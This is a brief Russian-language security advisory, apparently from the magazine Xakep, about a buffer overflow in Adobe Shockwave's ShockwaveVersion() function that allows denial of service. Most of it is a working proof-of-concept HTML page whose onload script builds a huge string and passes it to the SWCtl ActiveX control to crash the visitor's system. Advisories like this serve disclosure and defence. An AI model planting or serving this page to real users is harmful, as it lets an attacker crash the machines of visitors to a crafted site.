Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Adobe Shockwave
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в проверке входных данных в функции ShockwaveVersion(). Атакующий может обманным образом заманить пользователя на специально составленный сайт, что приведет к переполнению буфера и отказу системы в обслуживании.
Пример:
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 768 * 768) s=s+s;
var obj = new ActiveXObject("SWCtl.SWCtl"); //{233C1507-6A77-46A4-9443-F871F945D258}
obj.ShockwaveVersion(s);
}
</script>
</head>
<body onload="JavaScript: return Check();" />
</html>